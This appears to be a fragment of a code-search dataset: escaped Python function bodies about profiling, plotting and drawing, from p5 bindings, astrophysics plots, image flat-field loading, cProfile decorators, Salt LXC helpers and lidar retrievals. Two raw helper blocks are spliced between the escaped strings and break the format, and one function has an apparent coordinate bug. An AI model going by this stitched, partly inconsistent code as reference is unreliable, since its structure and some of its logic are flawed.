p5_instance.TRIANGLE_FAN\n TRIANGLE_STRIP = p5_instance.TRIANGLE_STRIP\n TRIANGLES = p5_instance.TRIANGLES\n TWO_PI = p5_instance.TWO_PI\n UP_ARROW = p5_instance.UP_ARROW\n VIDEO = p5_instance.VIDEO\n WAIT = p5_instance.WAIT\n WEBGL = p5_instance.WEBGL\n\n frameCount = p5_instance.frameCount\n focused = p5_instance.focused\n displayWidth = p5_instance.displayWidth\n displayHeight = p5_instance.displayHeight\n windowWidth = p5_instance.windowWidth\n windowHeight = p5_instance.windowHeight\n width = p5_instance.width\n height = p5_instance.height\n disableFriendlyErrors = p5_instance.disableFriendlyErrors\n deviceOrientation = p5_instance.deviceOrientation\n accelerationX = p5_instance.accelerationX\n accelerationY = p5_instance.accelerationY\n accelerationZ = p5_instance.accelerationZ\n pAccelerationX = p5_instance.pAccelerationX\n pAccelerationY = p5_instance.pAccelerationY\n pAccelerationZ = p5_instance.pAccelerationZ\n rotationX = p5_instance.rotationX\n rotationY = p5_instance.rotationY\n rotationZ = p5_instance.rotationZ\n pRotationX = p5_instance.pRotationX\n pRotationY = p5_instance.pRotationY\n pRotationZ = p5_instance.pRotationZ\n turnAxis = p5_instance.turnAxis\n keyIsPressed = p5_instance.keyIsPressed\n key = p5_instance.key\n keyCode = p5_instance.keyCode\n mouseX = p5_instance.mouseX\n mouseY = p5_instance.mouseY\n pmouseX = p5_instance.pmouseX\n pmouseY = p5_instance.pmouseY\n winMouseX = p5_instance.winMouseX\n winMouseY = p5_instance.winMouseY\n pwinMouseX = p5_instance.pwinMouseX\n pwinMouseY = p5_instance.pwinMouseY\n mouseButton = p5_instance.mouseButton\n mouseIsPressed = p5_instance.mouseIsPressed\n touches = p5_instance.touches\n pixels = p5_instance.pixels\n\n return draw_func()", "def plot_profiles(snap, profs, dust_species_to_plot, debug=False):\n print('Plotting profiles...')\n\n units = {\n 'position': 'au',\n 'gas_velocity_radial_analytical': 'dimensionless',\n 'dust_velocity_radial_analytical': 'dimensionless',\n 'velocity_radial_numerical': 'dimensionless',\n }\n p = profs['gas'][0]\n\n if debug:\n num_dust = snap.num_dust_species\n ax = p.plot(x='radius', y=['velocity_pressure', 'velocity_visc'], units=units)\n y = ['gas_velocity_radial']\n y += [f'dust_velocity_radial_{idx+1:03}' for idx in range(num_dust)]\n ax = p.plot(x='radius', y=y, units=units)\n ax.legend().remove()\n\n fig, ax = plt.subplots()\n\n # Plot \"analytical\" radial drift velocity / velocity pressure component\n p.plot(\n x='radius',\n y='gas_velocity_radial_analytical',\n units=units,\n color='black',\n label='',\n ax=ax,\n )\n y = [f'dust_velocity_radial_analytical_{idx+1:03}' for idx in dust_species_to_plot]\n p.plot(x='radius', y=y, units=units, label='', ax=ax)\n colors = [line.get_color() for line in ax.lines[1:]]\n\n # Plot \"numerical\" radial drift velocity / velocity pressure component\n p.plot(\n x='radius',\n y='velocity_radial_numerical',\n units=units,\n color='black',\n linestyle='',\n marker='o',\n markersize=4,\n fillstyle='none',\n label='gas',\n std='shading',\n ax=ax,\n )\n profs_to_plot = [\n prof for idx, prof in enumerate(profs['dust']) if idx in dust_species_to_plot\n ]\n for species, prof, color in zip(dust_species_to_plot, profs_to_plot, colors):\n label = f'{snap.properties[\"grain_size\"][species].to(\"cm\"):.1f~P}'\n prof.plot(\n x='radius',\n y='velocity_radial_numerical',\n units=units,\n color=color,\n linestyle='',\n marker='o',\n markersize=4,\n fillstyle='none',\n label=label,\n std='shading',\n ax=ax,\n )\n\n ax.set_ylabel(r'$v_R / |v_P|$')\n ax.grid()\n\n 
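# The profiles plotted by plot_profiles() are radial averages. For reference,
# the function below is a minimal sketch (with assumed inputs, unrelated to
# the profs objects used above) of how such a radial profile can be binned by
# hand: bucket particles by radius, then average a quantity per bin.
import numpy as np

def radial_profile(radius, quantity, bins):
    """Return bin centres and the mean of `quantity` in each radial bin."""
    idx = np.digitize(radius, bins) - 1
    means = np.array([
        quantity[idx == i].mean() if np.any(idx == i) else np.nan
        for i in range(len(bins) - 1)
    ])
    return 0.5 * (bins[:-1] + bins[1:]), means

r = np.random.uniform(10.0, 200.0, 10_000)   # hypothetical radii in au
centres, prof = radial_profile(r, 1.0 / np.sqrt(r), np.linspace(10, 200, 40))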
textstr = f't = {snap.properties[\"time\"].to(\"years\").m:.0f} years'\n bbox = dict(boxstyle='round', facecolor='white', edgecolor='grey', alpha=0.8)\n ax.text(\n 0.97,\n 0.97,\n textstr,\n transform=ax.transAxes,\n horizontalalignment='right',\n verticalalignment='top',\n bbox=bbox,\n )\n ax.legend(framealpha=0.8, edgecolor='grey')\n\n return ax", "def _load_single_profile(self, path, num_channels, img_size, profile_type):\n assert profile_type in ('dark', 'flat'), \"profile_type must be either 'dark' or 'flat'.\"\n if path is None:\n profile_shape = (num_channels, 1, 1)\n return (\n np.zeros(profile_shape)\n if profile_type == 'dark'\n else np.ones(profile_shape)\n )\n\n expected_ndim = 2 if num_channels == 1 else 3\n profile = skimage.io.imread(path)\n if profile.ndim != expected_ndim:\n raise ValueError(\n 'Expect dimensionality is {} for {}-field profile but {} has {} dimensions.'.format(\n expected_ndim, profile_type, path, profile.ndim\n )\n )\n\n profile = np.atleast_3d(profile)\n # skimage.io.imread convert images with 3 and 4 channels into (Y, X, C) shape,\n # but as (C, Y, X) for images with other channel numbers. We normalize\n # image-shape to (C, Y, X) regardless of the number of channels in the image.\n if num_channels in (1, 3, 4):\n profile = np.moveaxis(profile, 2, 0)\n if profile.shape != (num_channels,) + img_size:\n raise ValueError(\n '{}-field profile shape {} does not match target image shape {}.'.format(\n profile_type.capitalize(), profile.shape, img_size\n )\n )\n\n if self.barrel_correction:\n cval = 0 if profile_type == \"dark\" else 1\n for cimg in profile:\n cimg[:] = transform.barrel_correction(\n cimg, self.barrel_correction, cval=cval\n )\n\n return profile", "def draw(self, offset=geo.zero2d()):\n self._draw_bar(self._get_active_color(), self.inactive_color, offset)\n console.set_default_color_fg(self.text_color)\n self._draw_numbers(offset)", "def cprofiler(fun, *args, **kwargs):\n print(f\"Profiling {fun.__name__}\")\n with cProfile.Profile() as pr:\n fun(*args, **kwargs)\n pr.print_stats()", "def artUserPaintCtx(*args, accopacity: bool=False, activeListChangedProc: Union[AnyStr,\n bool]=\"\", afterStrokeCmd: Union[AnyStr, bool]=\"\", alphaclamp: Union[AnyStr,\n bool]=\"none\", alphaclamplower: Union[float, bool]=0.0, alphaclampupper:\n Union[float, bool]=1.0, attrSelected: Union[AnyStr, bool]=\"\",\n beforeStrokeCmd: Union[AnyStr, bool]=\"\", brushalignment: bool=True,\n brushfeedback: bool=True, chunkCommand: Union[AnyStr, bool]=\"\", clamp:\n Union[AnyStr, bool]=\"none\", clamplower: Union[float, bool]=0.0, clampupper:\n Union[float, bool]=1.0, clear: bool=True, colorAlphaValue: Union[float,\n bool]=0.0, colorRGBAValue: Union[List[float, float, float, float],\n bool]=None, colorRGBValue: Union[List[float, float, float], bool]=None,\n colorRamp: Union[AnyStr, bool]=\"\", colorfeedback: bool=False,\n colorfeedbackOverride: bool=False, colorrangelower: Union[float, bool]=0.0,\n colorrangeupper: Union[float, bool]=1.0, dataTypeIndex: Union[int, bool]=0,\n disablelighting: bool=False, dragSlider: AnyStr=\"\", duringStrokeCmd:\n Union[AnyStr, bool]=\"\", dynclonemode: bool=True, exists: bool=True,\n expandfilename: bool=True, exportaspectratio: Union[float, bool]=0.0,\n exportfilemode: Union[AnyStr, bool]=\"luminance/rgb\", exportfilesave:\n AnyStr=\"\", exportfilesizex: Union[int, bool]=0, exportfilesizey: Union[int,\n bool]=0, exportfiletype: Union[AnyStr, bool]=\"\", filterNodes: bool=True,\n finalizeCmd: Union[AnyStr, bool]=\"\", fullpaths: 
bool=False,\n getArrayAttrCommand: Union[AnyStr, bool]=\"\", getSurfaceCommand:\n Union[AnyStr, bool]=\"\", getValueCommand: Union[AnyStr, bool]=\"\", history:\n bool=True, image1: Union[AnyStr, bool]=\"\", image2: Union[AnyStr, bool]=\"\",\n image3: Union[AnyStr, bool]=\"\", importfileload: AnyStr=\"\", importfilemode:\n Union[AnyStr, bool]=\"alpha\", importreassign: bool=False, initializeCmd:\n Union[AnyStr, bool]=\"\", interactiveUpdate: bool=True, lastRecorderCmd:\n Union[AnyStr, bool]=\"\", lastStampName: Union[AnyStr, bool]=\"\", lowerradius:\n Union[float, bool]=0.0, makeStroke: Union[int, List[int], bool]=0,\n mappressure: Union[AnyStr, bool]=\"none\", maxvalue: Union[float, bool]=1.0,\n minvalue: Union[float, bool]=0.0, name: AnyStr=\"\", objattrArray:\n Union[AnyStr, bool]=\"\", opacity: Union[float, bool]=1.0, outline: bool=True,\n outwhilepaint: bool=False, paintNodeArray: Union[AnyStr, bool]=\"\",\n paintattrselected: AnyStr=\"\", paintmode: Union[AnyStr, bool]=\"screen\",\n paintoperationtype: Union[AnyStr, bool]=\"Paint\", pickColor: bool=True,\n pickValue: bool=True, playbackCursor: Union[List[float, float],\n List[List[float, float]], bool]=None, playbackPressure: Union[float,\n List[float], bool]=0.0, preserveclonesource: bool=True, profileShapeFile:\n Union[AnyStr, bool]=\"\", projective: bool=False, radius: Union[float,\n bool]=1.0, rampMaxColor: Union[List[float, float, float], bool]=None,\n rampMinColor: Union[List[float, float, float], bool]=None, record:\n bool=True, reflection: bool=False, reflectionaboutorigin: bool=True,\n reflectionaxis: Union[AnyStr, bool]=\"x\", screenRadius: Union[float,\n bool]=0.0, selectclonesource: bool=True, selectedattroper: Union[AnyStr,\n bool]=\"absolute\", setArrayValueCommand: Union[AnyStr, bool]=\"\",\n setValueCommand: Union[AnyStr, bool]=\"\", showactive: bool=True, stampDepth:\n Union[float, bool]=0.0, stampProfile: Union[AnyStr, bool]=\"\", stampSpacing:\n Union[float, bool]=1.0, strokesmooth: Union[AnyStr, bool]=\"\",\n surfaceConformedBrushVertices: bool=True, tablet: bool=True,\n tangentOutline: bool=True, toolCleanupCmd: Union[AnyStr, bool]=\"\",\n toolOffProc: Union[AnyStr, bool]=\"\", toolOnProc: Union[AnyStr, bool]=\"\",\n toolSetupCmd: Union[AnyStr, bool]=\"\", useColorRamp: bool=True,\n useMaxMinColor: bool=True, usepressure: bool=False, value: Union[float,\n bool]=0.0, whichTool: Union[AnyStr, bool]=\"\", worldRadius: Union[float,\n bool]=0.0, q=True, query=True, e=True, edit=True, **kwargs)->Union[AnyStr,\n Any]:\n pass", "def getprofile(self, *args, **kwargs):\n return _image.image_getprofile(self, *args, **kwargs)", "def profile(points, flat_file, num_points=100, scan_dir=0):\n length = 0\n for p in range(len(points) - 1):\n length += np.sqrt((points[p + 1, 0] - points[p, 0]) ** 2 + (points[p + 1, 1] - points[p, 0]) ** 2)\n\n x_len = len(flat_file[scan_dir].data[0])\n y_len = len(flat_file[scan_dir].data)\n\n for point in range(len(points)):\n points[point][0] = nm2pnt(points[point][0], flat_file, axis='x')\n points[point][1] = nm2pnt(points[point][1], flat_file, axis='y')\n if points[point][0] >= x_len:\n points[point][0] = x_len - 1\n if points[point][1] >= y_len:\n points[point][1] = y_len - 1\n\n def line(coords, flat_file):\n\n x0, y0 = coords[0]\n x1, y1 = coords[1]\n num = num_points\n x, y = np.linspace(x0, x1, num), np.linspace(y0, y1, num)\n\n zi = flat_file[scan_dir].data[y.astype(np.int), x.astype(np.int)]\n\n return zi\n\n profile_data = np.array([])\n for pair in range(len(points) - 1):\n 
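# The inner line() helper above samples an image along a straight segment by
# generating evenly spaced coordinates and indexing with their integer parts
# (nearest-neighbour sampling). A standalone sketch of the same idea, with an
# assumed 2-D array input:
import numpy as np

def sample_line(image, p0, p1, num=100):
    """Read `num` nearest-neighbour samples from image between p0 and p1."""
    x = np.linspace(p0[0], p1[0], num)
    y = np.linspace(p0[1], p1[1], num)
    return image[y.astype(int), x.astype(int)]

demo = np.arange(100 * 100).reshape(100, 100)
diagonal = sample_line(demo, (0, 0), (99, 99))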
profile_data = np.append(profile_data, line([points[pair], points[pair + 1]], flat_file))\n\n return profile_data, length", "async def profile(self, ctx:utils.Context):\n\n pass", "def _AddAttenProbsImageSummary(self, name, atten_probs):\n\n def PlotAttention(fig, axes, cur_atten_probs, title):\n plot.AddImage(fig, axes, cur_atten_probs, title=title)\n axes.set_ylabel(plot.ToUnicode('Output sequence index'), wrap=True)\n axes.set_xlabel(plot.ToUnicode('Input sequence index'), wrap=True)\n\n with plot.MatplotlibFigureSummary(\n name + '/atten_example',\n figsize=(10, 10),\n max_outputs=1,\n subplot_grid_shape=(1, 1)) as fig:\n # Extract first entry in batch of attention prob matrices\n # [tgt_len, src_len]\n fig.AddSubplot([atten_probs], PlotAttention, title='atten_probs')", "def log_transform_features_customer(profile):\n\n view_amount_features = ['max_duration_view_profile', 'view_rate_profile', 'max_amount', \\\n 'min_duration_view_profile', 'min_amount',\\\n 'avg_amount', 'avg_trx_cnt', 'avg_duration_view_profile']\n\n profile_transformed = np.log(profile[view_amount_features]+1)\n\n profile = pd.concat([profile[['gender', 'age', 'became_member_on', 'income']]\\\n \t,profile_transformed], axis=1)\n\n profile.drop(columns=['income', 'min_amount', 'avg_amount', 'avg_duration_view_profile']\\\n \t, inplace=True)\n\n u.save_dataframe_to_sql(profile, 'profile')\n\n return profile", "def live_profile(script, argv, timer, interval, spawn, signum,\n pickle_protocol, mono):\n filename, code, globals_ = script\n sys.argv[:] = [filename] + list(argv)\n parent_sock, child_sock = socket.socketpair()\n pid = os.fork()\n if pid == 0:\n # child\n devnull = os.open(os.devnull, os.O_RDWR)\n for f in [sys.stdin, sys.stdout, sys.stderr]:\n os.dup2(devnull, f.fileno())\n frame = sys._getframe()\n profiler = BackgroundProfiler(timer, frame, code, signum)\n profiler.prepare()\n server_args = (interval, noop, pickle_protocol)\n server = SelectProfilingServer(None, profiler, *server_args)\n server.clients.add(child_sock)\n spawn(server.connected, child_sock)\n try:\n exec_(code, globals_)\n finally:\n child_sock.close()\n else:\n # parent\n viewer, loop = make_viewer(mono)\n title = get_title(filename)\n client = ProfilingClient(viewer, loop.event_loop, parent_sock, title)\n client.start()\n try:\n loop.run()\n except KeyboardInterrupt:\n pass\n finally:\n parent_sock.close()\n os.kill(pid, signal.SIGINT)", "def profile(func):\n def wrapper(*args, **kwargs):\n profile_filename = func.__name__ + '.prof'\n profiler = cProfile.Profile()\n result = profiler.runcall(func, *args, **kwargs)\n profiler.dump_stats(profile_filename)\n return result\n return wrapper", "def _get_base(**kwargs):\n profile = get_container_profile(copy.deepcopy(kwargs.get(\"profile\")))\n kw_overrides = copy.deepcopy(kwargs)\n\n def select(key, default=None):\n kw_overrides_match = kw_overrides.pop(key, _marker)\n profile_match = profile.pop(key, default)\n # let kwarg overrides be the preferred choice\n if kw_overrides_match is _marker:\n return profile_match\n return kw_overrides_match\n\n template = select(\"template\")\n image = select(\"image\")\n vgname = select(\"vgname\")\n path = kwargs.get(\"path\", None)\n # remove the above three variables from kwargs, if they exist, to avoid\n # duplicates if create() is invoked below.\n for param in (\"path\", \"image\", \"vgname\", \"template\"):\n kwargs.pop(param, None)\n\n if image:\n proto = urllib.parse.urlparse(image).scheme\n img_tar = __salt__[\"cp.cache_file\"](image)\n img_name = 
os.path.basename(img_tar)\n hash_ = salt.utils.hashutils.get_hash(\n img_tar, __salt__[\"config.get\"](\"hash_type\")\n )\n name = f\"__base_{proto}_{img_name}_{hash_}\"\n if not exists(name, path=path):\n create(\n name, template=template, image=image, path=path, vgname=vgname, **kwargs\n )\n if vgname:\n rootfs = os.path.join(\"/dev\", vgname, name)\n edit_conf(\n info(name, path=path)[\"config\"],\n out_format=\"commented\",\n **{\"lxc.rootfs\": rootfs},\n )\n return name\n elif template:\n name = f\"__base_{template}\"\n if not exists(name, path=path):\n create(\n name, template=template, image=image, path=path, vgname=vgname, **kwargs\n )\n if vgname:\n rootfs = os.path.join(\"/dev\", vgname, name)\n edit_conf(\n info(name, path=path)[\"config\"],\n out_format=\"commented\",\n **{\"lxc.rootfs\": rootfs},\n )\n return name\n return \"\"", "def plot(cp_profile, *args, destination=\"browser\",\n show_profiles=True, show_observations=True, show_residuals=False, show_rugs=False,\n aggregate_profiles=None, selected_variables=None,\n color=None, size=2, alpha=0.4,\n color_pdps=None, size_pdps=None, alpha_pdps=None,\n color_points=None, size_points=None, alpha_points=None,\n color_residuals=None, size_residuals=None, alpha_residuals=None,\n height=500, width=600,\n plot_title='', yaxis_title='y',\n print_observations=True,\n **kwargs):\n\n params = dict()\n params.update(kwargs)\n params[\"variables\"] = _calculate_plot_variables(cp_profile, selected_variables)\n params['color'] = \"_label_\" if args else color\n params['show_profiles'] = show_profiles\n params['show_observations'] = show_observations\n params['show_rugs'] = show_rugs\n params['show_residuals'] = show_residuals and (cp_profile.new_observation_true is not None)\n params['add_table'] = print_observations\n params['height'] = height\n params['width'] = width\n params['plot_title'] = plot_title\n params['size_ices'] = size\n params['alpha_ices'] = alpha\n params = _params_update(params,\n color_pdps=color_pdps, size_pdps=size_pdps, alpha_pdps=alpha_pdps,\n size_points=size_points, alpha_points=alpha_points, color_points=color_points,\n size_residuals=size_residuals, alpha_residuals=alpha_residuals,\n color_residuals=color_residuals,\n yaxis_title=yaxis_title)\n\n if aggregate_profiles in {'mean', 'median', None}:\n params['aggregate_profiles'] = aggregate_profiles\n else:\n logging.warning(\"Incorrect function for profile aggregation: {}. 
Parameter ignored.\"\n \"Available values are: 'mean' and 'median'\".format(aggregate_profiles))\n params['aggregate_profiles'] = None\n\n all_profiles = [cp_profile] + list(args)\n\n plot_id = str(next(_PLOT_NUMBER))\n plot_path, params_path, obs_path, profile_path = _get_data_paths(plot_id)\n\n with open(params_path, 'w') as f:\n f.write(\"params = \" + json.dumps(params, indent=2) + \";\")\n\n save_observations(all_profiles, obs_path)\n save_profiles(all_profiles, profile_path)\n\n with app.app_context():\n data = render_template(\"plot_template.html\", i=plot_id, params=params)\n\n with open(plot_path, 'w') as f:\n f.write(data)\n\n destination = _detect_plot_destination(destination)\n if destination == \"notebook\":\n from IPython.display import IFrame, display\n display(IFrame(plot_path, width=int(width * 1.1), height=int(height * 1.1)))\n else:\n # open plot in a browser\n if sys.platform == \"darwin\": # check if on OSX\n plot_path = \"file://\" + os.path.abspath(plot_path)\n webbrowser.open(plot_path)", "def apply_double_profile(plotDict, args=None):\n\tif not 'prof' in plotDict['tree_draw_options'] or 'profs' in plotDict['tree_draw_options']:\n\t\tif isinstance(plotDict['tree_draw_options'], basestring):\n\t\t\tplotDict['tree_draw_options'] = [plotDict['tree_draw_options']]\n\t\tplotDict['tree_draw_options'].append('prof')\n\t# Parameter List Expansion\n\t# the x vs x profile must be an exakt match of y vs x\n\t# we thus must replicate all settings for their position to match\n\t# settings we need to replicate in a controlled fashion\n\tinput_root_opts = ['nicks', 'x_expressions', 'y_expressions', 'z_expressions', 'x_bins', 'y_bins', 'z_bins', 'scale_factors', 'files', 'directories', 'folders', 'weights', 'friend_trees', 'tree_draw_options']\n\t\n\tif not plotDict.get('files'):\n\t\tplotDict['files'] = get_input_files(args)[0]\n\t# make sure all n-length (non-0,1) objects have the same size\n\topt_n_length_max = max(len(plotDict.get(opt_name, ())) for opt_name in input_root_opts if not isinstance(plotDict.get(opt_name), str))\n\tassert opt_n_length_max > 0, 'Cannot expand empty plot definition'\n\tfor opt_name in input_root_opts:\n\t\tif opt_name not in plotDict or isinstance(plotDict[opt_name], str):\n\t\t\tcontinue\n\t\tassert len(plotDict[opt_name]) <= 1 or len(plotDict[opt_name]) == opt_n_length_max, \"Replication requires all input_root options to be either of 0, 1 or same max length ('%s' is %d/%d)\" % (opt_name, len(plotDict[opt_name]), opt_n_length_max)\n\t\t# TODO: dunno if checking for None is required, saw this in HP - MF@20151130\n\t\tif not plotDict[opt_name] or plotDict[opt_name][0] is None:\n\t\t\tcontinue\n\t\tif len(plotDict[opt_name]) == 1:\n\t\t\tplotDict[opt_name] = plotDict[opt_name] * opt_n_length_max\n\t\t# never modify inplace - input may be mutable and used elsewhere/recursively\n\t\tplotDict[opt_name] = plotDict[opt_name][:] * 2\n\tif not plotDict.get('nicks') or plotDict['nicks'][0] is None:\n\t\tplotDict['nicks'] = [\"nick%d\" % nick for nick in xrange(len(plotDict['y_expressions']))]\n\t# X-Y Profile matching\n\t# explicitly create new x profiles\n\tplotDict['y_expressions'] = plotDict['y_expressions'][:opt_n_length_max] + plotDict['x_expressions'][opt_n_length_max:]\n\tplotDict['nicks'] = plotDict['nicks'][opt_n_length_max:] + ['%s_x_prof' % nick for nick in plotDict['nicks'][:opt_n_length_max]]\n\t# create new y vs <x> graphs\n\tplotDict['analysis_modules'] = plotDict.get('analysis_modules', [])[:]\n\tplotDict['analysis_modules'].insert(0, 
'TGraphFromHistograms')\n\tplotDict['tgraph_strip_empty'] = 'any'\n\tplotDict['tgraph_y_nicks'] = plotDict['nicks'][:opt_n_length_max]\n\tplotDict['tgraph_x_nicks'] = plotDict['nicks'][opt_n_length_max:]\n\tplotDict['tgraph_result_nicks'] = ['%s_vs_x_prof' % nick for nick in plotDict['nicks'][:opt_n_length_max]]\n\t# disable source plots\n\tplotDict['nicks_blacklist'] = [r'^%s$' % nick for nick in plotDict['nicks']]\n\treturn plotDict", "def profile(x):\n return x", "def _atexit_print_fn():\r\n to_sum = []\r\n for ps in _atexit_print_list:\r\n if ps.fct_callcount or ps.compile_time > 0:\r\n ps.summary(file=_atexit_print_file,\r\n n_ops_to_print=config.profiling.n_ops,\r\n n_apply_to_print=config.profiling.n_apply)\r\n if not isinstance(ps, ScanProfileStats):\r\n to_sum.append(ps)\r\n else:\r\n #TODO print the name if there is one!\r\n print 'Skipping empty Profile'\r\n if len(to_sum) > 1:\r\n # Make a global profile\r\n cum = copy.copy(to_sum[0])\r\n cum.message = \"Sum of all printed profiles at exit excluding Scan op profile.\"\r\n for ps in to_sum[1:]:\r\n for attr in [\"compile_time\", \"fct_call_time\", \"fct_callcount\",\r\n \"vm_call_time\", \"optimizer_time\", \"linker_time\",\r\n \"validate_time\"]:\r\n setattr(cum, attr, getattr(cum, attr) + getattr(ps, attr))\r\n\r\n #merge dictonary\r\n for attr in [\"apply_time\", \"apply_callcount\",\r\n \"apply_cimpl\", \"variable_shape\", \"variable_strides\"]:\r\n cum_attr = getattr(cum, attr)\r\n for key, val in getattr(ps, attr).iteritems():\r\n assert key not in cum_attr\r\n cum_attr[key] = val\r\n\r\n if cum.optimizer_profile and ps.optimizer_profile:\r\n merge = cum.optimizer_profile[0].merge_profile(\r\n cum.optimizer_profile[1],\r\n ps.optimizer_profile[1])\r\n cum.optimizer_profile = (cum.optimizer_profile[0], merge)\r\n else:\r\n cum.optimizer_profile = None\r\n\r\n cum.summary(file=_atexit_print_file,\r\n n_ops_to_print=config.profiling.n_ops,\r\n n_apply_to_print=config.profiling.n_apply)", "def profile(_func=None,\n profile_id=None,\n sort_by=u'cumulative'):\n\n profilers.register(profile_id)\n\n def arg_wrapper(func):\n\n \"\"\" This is the real decorator and profiles the decorated function. \"\"\"\n\n @functools.wraps(func)\n def wrapper(*args,\n **kwargs):\n\n \"\"\" Simple profiler for the function.\n\n :param args: Args for the function.\n :param kwargs: Kwargs for the function.\n :return: The result of the function.\n \"\"\"\n\n _profiler = profilers.start_if_active(profile_id)\n\n # Run the function\n result = func(*args,\n **kwargs)\n\n profilers.stop_if_active(func=func,\n profile_id=profile_id,\n profiler=_profiler,\n sort_by=sort_by)\n\n # Return the function result\n return result\n\n # Return the decorated function\n return wrapper\n\n # _func's type depends on the usage of the decorator. 
It's a function\n # if it's used as `@decorator` but ``None`` if used as `@decorator()`.\n return arg_wrapper if _func is None else arg_wrapper(_func)", "def profile_function(fun: Callable,\n args: tuple or list = (),\n kwargs: dict or None = None,\n backends=None,\n trace=True,\n subtract_trace_time=True,\n retime=True,\n warmup=1,\n call_count=1) -> Profile:\n kwargs = kwargs if isinstance(kwargs, dict) else {}\n for _ in range(warmup):\n fun(*args, **kwargs)\n with profile(backends=backends, trace=trace, subtract_trace_time=subtract_trace_time) as prof:\n fun(*args, **kwargs)\n if retime:\n with prof.retime():\n fun(*args, **kwargs)\n if call_count > 1:\n with prof._accumulate_average(call_count):\n for _ in range(call_count - 1):\n fun(*args, **kwargs)\n return prof", "def annotate(args):\n prism.annotate.run(\n input_fp=args.input,\n output_fp=args.output,\n bed_fps=args.beds,\n annotation_names=args.annotation_names,\n output_figure_fp=args.figure,\n width=args.width,\n height=args.height,\n scale=args.scale,\n font_family=args.font_family,\n )", "def draw_page(page, stream):\n bleed = {\n side: page.style[f'bleed_{side}'].value\n for side in ('top', 'right', 'bottom', 'left')}\n marks = page.style['marks']\n stacking_context = StackingContext.from_page(page)\n draw_background(\n stream, stacking_context.box.background, clip_box=False, bleed=bleed,\n marks=marks)\n draw_background(stream, page.canvas_background, clip_box=False)\n draw_border(stream, page)\n draw_stacking_context(stream, stacking_context)", "def profile(func):\n\n def wrapper(*args, **kwargs):\n profile_filename = func.__name__ + \".prof\"\n profiler = cProfile.Profile()\n result = profiler.runcall(func, *args, **kwargs)\n profiler.dump_stats(profile_filename)\n return result\n\n return wrapper", "def profile(request):\n draws = []\n try:\n draws = MONGO.get_user_draws(request.user.pk)\n except Exception as e:\n LOG.error(\"There was an issue when retrieving user draws. 
{0}\".format(e))\n\n context = {'draws': draws}\n return render(request, 'profile.html', context)", "def setprofile(self, w_func):\n if self.space.is_w(w_func, self.space.w_None):\n self.profilefunc = None\n self.w_profilefuncarg = None\n else:\n self.setllprofile(app_profile_call, w_func)", "def draw_image(self, image, src_coor, src_size, dest_coor, dest_size, angle = 0):\n img = Image_process.update(image, src_coor, src_size, dest_size, angle)\n self.canvas.create_image(dest_coor, image=img)", "def DrawBase(screen, base_x, base_y, base_len, base_width):\n pygame.draw.rect(screen, (255,0,0),(base_x, base_y, base_len*2, base_width*2), 4)", "def TDProfiles(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)\n \n# plt.figure()\n# plt.plot(np.exp(xS[:,0]))\n# plt.title('Temperature [K]')\n# \n# plt.figure()\n# plt.semilogy(np.exp(xS[:,1]))\n# plt.title('WV number density [$m^{-3}$]')\n# \n# plt.figure()\n# plt.semilogy(np.exp(xS[:,2])+1)\n# plt.title('Backscatter Ratio')\n \n \n# HSRLModel = HSRLProfileRatio(xS[:,0],P,xS[:,2], \\\n# Trx['HSRL Mol'],Trx['HSRL Comb'], \\\n# rb_spec['HSRL'],inu0['HSRL'],GainRatio=xK[0])\n\n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)\n\n# WVModel = WaterVaporProfileRatio(xS[:,0],P,xS[:,1],xS[:,2]*bsrMult['WV'],\n# Trx['WV Online'], Trx['WV Offline'], \\\n# rb_spec['WV Online'],rb_spec['WV Offline'], \\\n# abs_spec['WV Online'],abs_spec['WV Offline'],dr, \\\n# inu0['WV Online'],inu0['WV Offline'],GainRatio=xK[1])\n\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)\n \n# O2Model = OxygenProfileRatio(xS[:,0],P,xS[:,1],xS[:,2]*bsrMult['O2'],\n# Trx['O2 Online'], Trx['O2 Offline'], \\\n# rb_spec['O2 Online'],rb_spec['O2 Offline'], \\\n# abs_spec['O2 Online'],abs_spec['O2 Offline'],dr, \\\n# inu0['O2 Online'],inu0['O2 Offline'],GainRatio=xK[2])\n \n return HSRL_mol, HSRL_comb, WV_on, WV_off, O2_on, O2_off", "def Run_Profile(init,traits,Env,sig = 0.0001,Ntot0 = 10,tmax = 100,T=TS,dt = 0.01,mu=0.005):\n\n\t## Environmental conditions\n\tHinf = Env[0]\n\tCinf = Env[1]\n\tNinf = Env[2]\n\tGinf = Env[3]\n\tQH = Env[4]\n\tQC = Env[5]\n\tQN = Env[6]\n\tQG = Env[7]\n \n\t## Traits \n\tthresh = traits[7]\n\tslope = traits[8]\n\tgmax = traits[9]\n\tVc = traits[1]\n\tQc = 
